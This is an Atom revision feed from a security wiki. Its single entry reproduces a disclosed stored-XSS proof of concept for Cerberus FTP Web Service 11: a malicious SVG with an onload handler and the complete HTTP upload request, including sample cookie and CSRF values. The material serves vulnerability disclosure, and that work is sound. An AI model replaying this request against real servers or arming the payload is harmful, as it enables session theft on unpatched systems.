<?xml version="1.0"?>
<feed xmlns="http://www.w3.org/2005/Atom" xml:lang="chinese">
	<id>https://pwnwiki.com/index.php?action=history&amp;feed=atom&amp;title=Cerberus_FTP_Web_Service_11_XSS%E6%BC%8F%E6%B4%9E</id>
	<title>Cerberus FTP Web Service 11 XSS漏洞 - Revision history</title>
	<link rel="self" type="application/atom+xml" href="https://pwnwiki.com/index.php?action=history&amp;feed=atom&amp;title=Cerberus_FTP_Web_Service_11_XSS%E6%BC%8F%E6%B4%9E"/>
	<link rel="alternate" type="text/html" href="https://pwnwiki.com/index.php?title=Cerberus_FTP_Web_Service_11_XSS%E6%BC%8F%E6%B4%9E&amp;action=history"/>
	<updated>2026-04-20T08:32:09Z</updated>
	<subtitle>Revision history for this page on the wiki</subtitle>
	<generator>MediaWiki 1.35.1</generator>
	<entry>
		<id>https://pwnwiki.com/index.php?title=Cerberus_FTP_Web_Service_11_XSS%E6%BC%8F%E6%B4%9E&amp;diff=4754&amp;oldid=prev</id>
		<title>Pwnwiki: Created page with &quot;==XSS== &lt;pre&gt; # Exploit Title: Cerberus FTP web Service 11 - 'svg' Stored Cross-Site Scripting (XSS) # Date: 08/06/2021 # Exploit Author: Mohammad Hossein Kaviyany # Vendor Ho...&quot;</title>
		<link rel="alternate" type="text/html" href="https://pwnwiki.com/index.php?title=Cerberus_FTP_Web_Service_11_XSS%E6%BC%8F%E6%B4%9E&amp;diff=4754&amp;oldid=prev"/>
		<updated>2021-06-11T09:38:45Z</updated>

		<summary type="html">&lt;p&gt;Created page with &amp;quot;==XSS== &amp;lt;pre&amp;gt; # Exploit Title: Cerberus FTP web Service 11 - &amp;#039;svg&amp;#039; Stored Cross-Site Scripting (XSS) # Date: 08/06/2021 # Exploit Author: Mohammad Hossein Kaviyany # Vendor Ho...&amp;quot;&lt;/p&gt;
&lt;p&gt;&lt;b&gt;New page&lt;/b&gt;&lt;/p&gt;&lt;div&gt;==XSS==&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
# Exploit Title: Cerberus FTP web Service 11 - 'svg' Stored Cross-Site Scripting (XSS)&lt;br /&gt;
# Date: 08/06/2021&lt;br /&gt;
# Exploit Author: Mohammad Hossein Kaviyany&lt;br /&gt;
# Vendor Homepage: www.cerberusftp.com&lt;br /&gt;
# Software Link: https://www.cerberusftp.com/download/&lt;br /&gt;
# Version:11.0 releases prior to 11.0.4, 10.0 releases prior to 10.0.19, 9.0 and earlier&lt;br /&gt;
# Tested on: windows server 2016&lt;br /&gt;
------------&lt;br /&gt;
About Cerberus FTP Server (From Vendor Site) :     &lt;br /&gt;
                                &lt;br /&gt;
Cerberus FTP Server is a secure Windows file server with FTP, FTPS, SFTP, HTTPS, &lt;br /&gt;
FIPS 140-2 validated, and Active Directory and LDAP authentication.&lt;br /&gt;
--------------------------------------------------------&lt;br /&gt;
Exploit Detailes :&lt;br /&gt;
&lt;br /&gt;
This stored XSS bug happens when a user uploads an svg file with the following content :&lt;br /&gt;
&amp;lt;svg xmlns=&amp;quot;http://www.w3.org/2000/svg&amp;quot; onload=&amp;quot;alert(123)&amp;quot;/&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Exploit POC :&lt;br /&gt;
&lt;br /&gt;
# Vulnerable Path : /file/upload&lt;br /&gt;
# Parameter: files (POST)&lt;br /&gt;
# Vector: &amp;lt;svg xmlns=&amp;quot;http://www.w3.org/2000/svg&amp;quot; onload=&amp;quot;alert(123)&amp;quot;/&amp;gt;&lt;br /&gt;
&lt;br /&gt;
#Payload:  &lt;br /&gt;
&lt;br /&gt;
POST /file/upload HTTP/1.1&lt;br /&gt;
Host: target.com&lt;br /&gt;
Connection: close&lt;br /&gt;
Content-Length: 484&lt;br /&gt;
sec-ch-ua: &amp;quot; Not A;Brand&amp;quot;;v=&amp;quot;99&amp;quot;, &amp;quot;Chromium&amp;quot;;v=&amp;quot;90&amp;quot;, &amp;quot;Google Chrome&amp;quot;;v=&amp;quot;90&amp;quot;&lt;br /&gt;
Accept: application/json, text/javascript, */*; q=0.01&lt;br /&gt;
X-Requested-With: XMLHttpRequest&lt;br /&gt;
sec-ch-ua-mobile: ?0&lt;br /&gt;
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36&lt;br /&gt;
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryAAM6ZtOAsyklo6JG&lt;br /&gt;
Origin: https://target.com&lt;br /&gt;
Sec-Fetch-Site: same-origin&lt;br /&gt;
Sec-Fetch-Mode: cors&lt;br /&gt;
Sec-Fetch-Dest: empty&lt;br /&gt;
Referer: https://target.com/file/d/home/&lt;br /&gt;
Accept-Encoding: gzip, deflate&lt;br /&gt;
Accept-Language: en-US,en;q=0.9&lt;br /&gt;
Cookie: cftpSID=U02_5UCTumW3vFtt5PrlWwoD4k9ccxW0A87oCM8-jsM&lt;br /&gt;
&lt;br /&gt;
------WebKitFormBoundaryAAM6ZtOAsyklo6JG&lt;br /&gt;
Content-Disposition: form-data; name=&amp;quot;cd&amp;quot;&lt;br /&gt;
&lt;br /&gt;
/home&lt;br /&gt;
------WebKitFormBoundaryAAM6ZtOAsyklo6JG&lt;br /&gt;
Content-Disposition: form-data; name=&amp;quot;csrftoken&amp;quot;&lt;br /&gt;
&lt;br /&gt;
z-Zlffq0sPaJErxOsMgL4ITcW1x3AuZo3XlZRP5GcKg&lt;br /&gt;
------WebKitFormBoundaryAAM6ZtOAsyklo6JG&lt;br /&gt;
Content-Disposition: form-data; name=&amp;quot;files[]&amp;quot;; filename=&amp;quot;file.svg&amp;quot;&lt;br /&gt;
Content-Type: image/svg+xml&lt;br /&gt;
&lt;br /&gt;
&amp;lt;svg xmlns=&amp;quot;http://www.w3.org/2000/svg&amp;quot; onload=&amp;quot;alert(123)&amp;quot;/&amp;gt;&lt;br /&gt;
&lt;br /&gt;
------WebKitFormBoundaryAAM6ZtOAsyklo6JG--&lt;br /&gt;
&lt;br /&gt;
--------------------------&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;/div&gt;</summary>
		<author><name>Pwnwiki</name></author>
	</entry>
</feed>